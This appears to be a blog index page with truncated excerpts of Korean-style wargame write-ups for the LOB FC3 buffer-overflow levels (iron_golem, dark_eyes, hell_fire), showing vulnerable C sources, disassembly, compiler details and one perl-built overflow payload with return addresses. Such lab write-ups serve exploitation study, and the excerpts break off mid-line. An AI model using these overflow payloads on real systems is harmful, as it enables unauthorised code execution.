
wargame/LOB FC

LOB FC3 [dark_eyes -> hell_fire]: analysis of questions that came up while solving it
1. Why do we get a shell when ret is changed to ?
First, let's take a look at the assembly for that part.
0x75077f : call 0x743d30
0x750784 : mov ecx,DWORD PTR [ebx-316]
0x75078a : xor edx,edx
0x75078c : xor eax,eax
0x75078e : mov DWORD PTR [ebx+5820],edx
0x750794 : lea edx,[ebx-47601]
0x75079a : mov edi,DWORD PTR [ecx]
0x75079c : mov DWORD PTR [ebx+5816],eax
0x7507a2 : mov DWORD PTR [esp+4],esi
0x7507a6 : mov DWORD PTR [esp+8],edi
0x7507aa : mov DWORD PTR [esp]..
LOB FC3 [dark_eyes -> hell_fire]
[dark_eyes@Fedora_1stFloor ~]$ cat hell_fire.c
/* The Lord of the BOF : The Fellowship of the BOF
 - hell_fire
 - Remote BOF on Fedora Core 3
 - hint : another fake ebp or got overwriting
 - port : TCP 7777
*/
#include
int main(){
 char buffer[256];
 char saved_sfp[4];
 char temp[1024];
 printf("hell_fire : What's this smell?\n");
 printf("you : ");
 fflush(stdout);
 // give me a food
 fgets(temp, 1024, stdin..
LOB FC3 [iron_golem -> dark_eyes]
[iron_golem@Fedora_1stFloor ~]$ cat dark_eyes.c
/* The Lord of the BOF : The Fellowship of the BOF
 - dark_eyes
 - Local BOF on Fedora Core 3
 - hint : RET sleding
*/
int main(int argc, char *argv[]){
 char buffer[256];
 char saved_sfp[4];
 if(argc < 2){
  printf("argv error\n");
  exit(0);
 }
 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 // overflow!!
 strcpy(buffer, argv[1]);
 // restore sfp
 memcpy(buffer+26..
LOB FC3 [gate -> iron_golem]: analysis of questions that came up while solving it
1. Why does the attack fail when system is used instead of execve?
[gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x3,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa..
LOB FC3 [gate -> iron_golem]
Since this is the first problem, I will start with an analysis of the environment.
Fedora Core 3 environment analysis
Stack dummy : O
[gate@Fedora_1stFloor ~]$ gcc -v
Reading specs from /usr/lib/gcc/i386-redhat-linux/3.4.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-java-awt=gtk --..